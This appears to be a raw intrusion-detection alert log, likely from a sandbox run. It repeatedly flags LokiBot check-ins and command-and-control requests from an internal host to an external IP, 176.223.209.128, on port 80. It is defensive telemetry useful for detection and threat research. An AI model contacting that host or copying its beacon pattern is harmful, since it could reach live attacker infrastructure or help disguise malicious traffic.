                                              11/25/21-10:52:46.539469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2025381ET TROJAN LokiBot Checkin5038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:46.539469TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038980192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2025381ET TROJAN LokiBot Checkin5039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.049389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039080192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2025381ET TROJAN LokiBot Checkin5039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:47.487560TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039180192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2025381ET TROJAN LokiBot Checkin5039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.019785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039280192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2025381ET TROJAN LokiBot Checkin5039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:48.541433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039380192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2025381ET TROJAN LokiBot Checkin5039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.054536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039480192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2025381ET TROJAN LokiBot Checkin5039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:49.554648TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039580192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2025381ET TROJAN LokiBot Checkin5039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.100165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039680192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2025381ET TROJAN LokiBot Checkin5039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:50.619973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039780192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2025381ET TROJAN LokiBot Checkin5039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.114069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039880192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2025381ET TROJAN LokiBot Checkin5039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:51.626206TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25039980192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2025381ET TROJAN LokiBot Checkin5040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.072016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040080192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2025381ET TROJAN LokiBot Checkin5040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:52.565168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040180192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2025381ET TROJAN LokiBot Checkin5040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.024229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040280192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2025381ET TROJAN LokiBot Checkin5040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.467348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040380192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2025381ET TROJAN LokiBot Checkin5040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:53.974143TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040480192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2025381ET TROJAN LokiBot Checkin5040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.487405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040580192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2025381ET TROJAN LokiBot Checkin5040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:54.982708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040680192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2025381ET TROJAN LokiBot Checkin5040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:55.566183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040780192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2025381ET TROJAN LokiBot Checkin5040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.047377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040880192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2025381ET TROJAN LokiBot Checkin5040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:56.526257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25040980192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2025381ET TROJAN LokiBot Checkin5041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.024559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041080192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2025381ET TROJAN LokiBot Checkin5041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:57.529845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041180192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2025381ET TROJAN LokiBot Checkin5041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.031683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041280192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2025381ET TROJAN LokiBot Checkin5041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:58.610007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041380192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2025381ET TROJAN LokiBot Checkin5041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.074621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041480192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2025381ET TROJAN LokiBot Checkin5041580192.168.11.20176.223.209.128
                                              11/25/21-10:52:59.567879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041580192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2025381ET TROJAN LokiBot Checkin5041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.086672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041680192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2025381ET TROJAN LokiBot Checkin5041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:00.611075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041780192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2025381ET TROJAN LokiBot Checkin5041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.130911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041880192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2025381ET TROJAN LokiBot Checkin5041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:01.578296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25041980192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2025381ET TROJAN LokiBot Checkin5042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.060783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042080192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2025381ET TROJAN LokiBot Checkin5042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:02.537939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042180192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2025381ET TROJAN LokiBot Checkin5042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.009358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042280192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2025381ET TROJAN LokiBot Checkin5042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:03.550200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042380192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2025381ET TROJAN LokiBot Checkin5042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.065980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042480192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2025381ET TROJAN LokiBot Checkin5042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.540647TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042580192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2025381ET TROJAN LokiBot Checkin5042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:04.999029TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042680192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2025381ET TROJAN LokiBot Checkin5042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:05.526148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042780192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2025381ET TROJAN LokiBot Checkin5042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.040957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042880192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2025381ET TROJAN LokiBot Checkin5042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:06.546834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25042980192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2025381ET TROJAN LokiBot Checkin5043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.053704TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043080192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2025381ET TROJAN LokiBot Checkin5043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:07.512223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043180192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2025381ET TROJAN LokiBot Checkin5043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.018557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043280192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2025381ET TROJAN LokiBot Checkin5043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:08.530988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043380192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2025381ET TROJAN LokiBot Checkin5043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.043355TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043480192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2025381ET TROJAN LokiBot Checkin5043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:09.554097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043580192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2025381ET TROJAN LokiBot Checkin5043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.015600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043680192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2025381ET TROJAN LokiBot Checkin5043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:10.527559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043780192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2025381ET TROJAN LokiBot Checkin5043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.042169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043880192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2025381ET TROJAN LokiBot Checkin5043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:11.544618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25043980192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2025381ET TROJAN LokiBot Checkin5044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2025381ET TROJAN LokiBot Checkin5044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2025381ET TROJAN LokiBot Checkin5044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2025381ET TROJAN LokiBot Checkin5044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2025381ET TROJAN LokiBot Checkin5044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2025381ET TROJAN LokiBot Checkin5044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2025381ET TROJAN LokiBot Checkin5044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044780192.168.11.20176.223.209.128
